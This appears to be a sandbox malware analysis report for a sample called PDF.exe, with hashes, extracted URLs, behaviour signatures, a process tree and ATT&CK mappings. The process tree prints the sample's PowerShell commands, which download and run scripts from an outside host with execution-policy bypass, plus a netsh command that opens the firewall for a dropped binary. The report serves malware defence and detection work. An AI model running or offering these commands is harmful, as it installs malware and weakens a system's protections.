Overview
overview
10Static
static
101PDF.Fatur...07.exe
windows11-21h2-x64
83e6642f710...5e.exe
windows11-21h2-x64
104c40337094...92.exe
windows11-21h2-x64
10644d928a4a...25.exe
windows11-21h2-x64
1064ec6562b9...2e.exe
windows11-21h2-x64
107a0395c75a...8e.exe
windows11-21h2-x64
10901478668c...d4.exe
windows11-21h2-x64
10938b7e042b...98.exe
windows11-21h2-x64
1096d1bc7dec...b7.exe
windows11-21h2-x64
10Built.exe
windows11-21h2-x64
8DHL_PT5638...53.bat
windows11-21h2-x64
8DTLite.exe
windows11-21h2-x64
10PDF.Fatura...07.exe
windows11-21h2-x64
8PDF.exe
windows11-21h2-x64
10SIP.03746.XSLSX.exe
windows11-21h2-x64
8a33245a27c...8a.exe
windows11-21h2-x64
10arwbjuh.exe
windows11-21h2-x64
10bjutbht.exe
windows11-21h2-x64
10black.bat
windows11-21h2-x64
8borlndmm.dll
windows11-21h2-x64
10ccleaner.exe
windows11-21h2-x64
1d87e2dcd2e...6d.exe
windows11-21h2-x64
10dwvhgtd.exe
windows11-21h2-x64
10file.exe
windows11-21h2-x64
10helper.bat
windows11-21h2-x64
10setup.exe
windows11-21h2-x64
7Resubmissions
21-01-2025 13:35
250121-qvptgawqbk 1021-01-2025 11:58
250121-n5b91ssqem 1021-01-2025 11:44
250121-nwlr4a1qhs 1021-01-2025 11:07
250121-m7zbws1kfn 1017-07-2024 20:08
240717-ywvp4swhjk 10Analysis
-
max time kernel
59s -
max time network
63s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-07-2024 20:08
Behavioral task
behavioral1
Sample
1PDF.FaturaDetay_202407.exe
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
Resource
win11-20240709-en
Behavioral task
behavioral3
Sample
4c40337094cf0bb86fad86d2ea724ac6e6a499f0acd877839a69d35c354a7792.exe
Resource
win11-20240709-en
Behavioral task
behavioral4
Sample
644d928a4a942f6ae4c90640103b595941f7a0b557ba49d122d137b1429c0325.exe
Resource
win11-20240709-en
Behavioral task
behavioral5
Sample
64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
Resource
win11-20240709-en
Behavioral task
behavioral6
Sample
7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
Resource
win11-20240709-en
Behavioral task
behavioral7
Sample
901478668c0d5ecb3b5044dcb3e1744045f7b2a800a7c0c67020d9294470f3d4.exe
Resource
win11-20240709-en
Behavioral task
behavioral8
Sample
938b7e042bda75e416261e46d0d4873781fd5d53c2ce6c2748b92eeb8a826598.exe
Resource
win11-20240709-en
Behavioral task
behavioral9
Sample
96d1bc7dec91a7a4e5fe653853a504e07d17e898fa437cf75e929fa909dd6bb7.exe
Resource
win11-20240709-en
Behavioral task
behavioral10
Sample
Built.exe
Resource
win11-20240709-en
Behavioral task
behavioral11
Sample
DHL_PT563857935689275783656385FV-GDS3535353.bat
Resource
win11-20240709-en
Behavioral task
behavioral12
Sample
DTLite.exe
Resource
win11-20240709-en
Behavioral task
behavioral13
Sample
PDF.FaturaDetay_202407.exe
Resource
win11-20240709-en
Behavioral task
behavioral14
Sample
PDF.exe
Resource
win11-20240709-en
Behavioral task
behavioral15
Sample
SIP.03746.XSLSX.exe
Resource
win11-20240709-en
Behavioral task
behavioral16
Sample
a33245a27c02bbb72bf66f6bf1c960affefa8ed2a096dc1d6faa6699fe81c48a.exe
Resource
win11-20240709-en
Behavioral task
behavioral17
Sample
arwbjuh.exe
Resource
win11-20240709-en
Behavioral task
behavioral18
Sample
bjutbht.exe
Resource
win11-20240709-en
Behavioral task
behavioral19
Sample
black.bat
Resource
win11-20240709-en
Behavioral task
behavioral20
Sample
borlndmm.dll
Resource
win11-20240709-en
Behavioral task
behavioral21
Sample
ccleaner.exe
Resource
win11-20240709-en
Behavioral task
behavioral22
Sample
d87e2dcd2eb9763552645a34218696143fa99ac7b5173dcd04889ce9f5ddf96d.exe
Resource
win11-20240709-en
Behavioral task
behavioral23
Sample
dwvhgtd.exe
Resource
win11-20240709-en
Behavioral task
behavioral24
Sample
file.exe
Resource
win11-20240709-en
Behavioral task
behavioral25
Sample
helper.bat
Resource
win11-20240709-en
Behavioral task
behavioral26
Sample
setup.exe
Resource
win11-20240709-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Extracted
http://thelustfactory.com/vns/winrar.exe
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 2 1824 powershell.exe 3 1824 powershell.exe 4 240 powershell.exe 5 240 powershell.exe 6 892 powershell.exe 7 892 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2792 netsh.exe -
Executes dropped EXE 1 IoCs
pid Process 1828 winrar.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral14/files/0x000100000002aa63-64.dat pdf_with_link_action -
pid Process 1824 powershell.exe 240 powershell.exe 1252 powershell.exe 892 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 132 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1824 powershell.exe 1824 powershell.exe 240 powershell.exe 240 powershell.exe 1252 powershell.exe 1252 powershell.exe 892 powershell.exe 892 powershell.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 1252 powershell.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe Token: 33 1828 winrar.exe Token: SeIncBasePriorityPrivilege 1828 winrar.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4712 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe 4712 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 568 wrote to memory of 4764 568 PDF.exe 82 PID 568 wrote to memory of 4764 568 PDF.exe 82 PID 4764 wrote to memory of 1824 4764 cmd.exe 84 PID 4764 wrote to memory of 1824 4764 cmd.exe 84 PID 4764 wrote to memory of 240 4764 cmd.exe 86 PID 4764 wrote to memory of 240 4764 cmd.exe 86 PID 4764 wrote to memory of 1252 4764 cmd.exe 87 PID 4764 wrote to memory of 1252 4764 cmd.exe 87 PID 4764 wrote to memory of 892 4764 cmd.exe 88 PID 4764 wrote to memory of 892 4764 cmd.exe 88 PID 892 wrote to memory of 1828 892 powershell.exe 89 PID 892 wrote to memory of 1828 892 powershell.exe 89 PID 892 wrote to memory of 1828 892 powershell.exe 89 PID 4764 wrote to memory of 132 4764 cmd.exe 90 PID 4764 wrote to memory of 132 4764 cmd.exe 90 PID 4764 wrote to memory of 4712 4764 cmd.exe 91 PID 4764 wrote to memory of 4712 4764 cmd.exe 91 PID 4764 wrote to memory of 4712 4764 cmd.exe 91 PID 1828 wrote to memory of 2792 1828 winrar.exe 94 PID 1828 wrote to memory of 2792 1828 winrar.exe 94 PID 1828 wrote to memory of 2792 1828 winrar.exe 94 PID 4712 wrote to memory of 956 4712 AcroRd32.exe 96 PID 4712 wrote to memory of 956 4712 AcroRd32.exe 96 PID 4712 wrote to memory of 956 4712 AcroRd32.exe 96 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97 PID 956 wrote to memory of 4692 956 RdrCEF.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A3C.tmp\9A3D.tmp\9A3E.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Roaming\winrar.exe"C:\Users\Admin\AppData\Roaming\winrar.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\winrar.exe" "winrar.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2792
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:132
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CD89211E56918B338C54F8984D3F84BD --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4692
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C24AFAF229C47535B658F46DB0D3511C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C24AFAF229C47535B658F46DB0D3511C --renderer-client-id=2 --mojo-platform-channel-handle=1772 --allow-no-sandbox-job /prefetch:15⤵PID:232
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=86DC9FDB4A66458CDD46AA660F994790 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=86DC9FDB4A66458CDD46AA660F994790 --renderer-client-id=4 --mojo-platform-channel-handle=2356 --allow-no-sandbox-job /prefetch:15⤵PID:3208
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C9512473D65C7DABC78FA5BE305149F9 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1716
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=63D7142AB2F97E4343D55A3043902E91 --mojo-platform-channel-handle=1936 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2028
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E3B4E00D0D63AB55CEBBB62F416BAF43 --mojo-platform-channel-handle=2812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:816
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1428
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD56f5cafd0a8176e211a3181fb1588cee8
SHA15c062fe896caa3f7b5e1085921967b9c70e0a26e
SHA2568470dfe264662fb9750619b8f8b404b6b654dacb1c047aeb2af5f0a7c924d6d4
SHA5124958e841aa156ba0e9c804e3062a60b9b7398c0e8e5cf1bf3ce9b8caba0d18152794ca23fa44cc9fb3f9f00c77187c9dc3b5bfffa5489d7e359a000556c6f3a5
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
Filesize
1KB
MD53a567aec504be44e79f846ccf15afbeb
SHA1799599f8ef85db8e627f8b5d977b57b994621beb
SHA25651cf803d27435ffddac09529185ad4df24b476f22a40419875175c87ed183699
SHA5122d820ccaceccae4465346d508be3756754487513c294ed352ed6b0152e17e77593efb28a972d37fbdb769416ae77dd65ff3a5cbac4c317f0de9d1d1cbb3de6f4
-
Filesize
944B
MD5ea5a0b15a4152d282737ef33992467aa
SHA1e9188e3a25982b1477c6cbed57b46e091f4ad70e
SHA2568ddb2cb1482af22dff12819c55aa24d3e83dadbbc410e656b7f591422e627503
SHA512875ef3bf42d6ffd198b00e50f1cc7d539a410a9610fe3e87a47b44d7e4eabff7907672fbc6dc63fbe941d90217de0bb47c86ef8b0a9d17c04b9fd1cd9ecf33bd
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
